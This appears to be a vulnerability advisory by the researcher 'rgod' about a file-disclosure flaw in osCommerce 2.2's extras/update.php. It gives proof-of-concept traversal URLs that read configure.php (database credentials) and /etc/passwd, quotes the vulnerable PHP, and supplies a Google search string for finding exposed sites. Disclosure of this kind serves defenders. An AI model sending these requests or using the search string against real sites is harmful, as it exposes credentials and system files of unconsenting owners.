If the "extras" folder is placed inside the webroot on osCommerce versions less than v2.2 any file can be read on the target system, including php source code with the database details.
836c86179c8fc75a45bcdf0a06345f8eefef3a8dab21ff18199a17631890737f
---- osCommerce <= 2.2 "extras/" information/source code disclosure ------------
software site: http://www.oscommerce.com/
if extras/ folder is placed inside the www path, you can see all files on target
system, including php source code with database details, poc:
http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd
this is the vulnerable code in update.php:
...
include '../mysql.php';
// if a readme.txt file exists, display it to the user
if(!$read_me) {
if(file_exists('readme.txt')) {
$readme_file = 'readme.txt';
}
elseif(file_exists('README')) {
$readme_file = 'README';
}
elseif(file_exists('readme')) {
$readme_file = 'readme';
}
if($readme_file) {
$readme = file($readme_file);
print "<CENTER><TABLE BORDER=\"1\" WIDTH=\"75%\" CELLPADDING=\"2\" CELLSPACING=\"0\"><TR BGCOLOR=\"#e7e7cc\"><TD>\n";
print nl2br(htmlentities(implode($readme, ' ')));
print "<HR NOSHADE SIZE=\"1\"><CENTER><A HREF=\"update.php?read_me=1\"><B>Continue</B></A></CENTER>\n";
print "</TD></TR></TABLE>\n";
exit;
}
}
...
google search:
inurl:"extras/update.php" intext:mysql.php -display
--------------------------------------------------------------------------------
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/oscommerce_22_adv.html
--------------------------------------------------------------------------------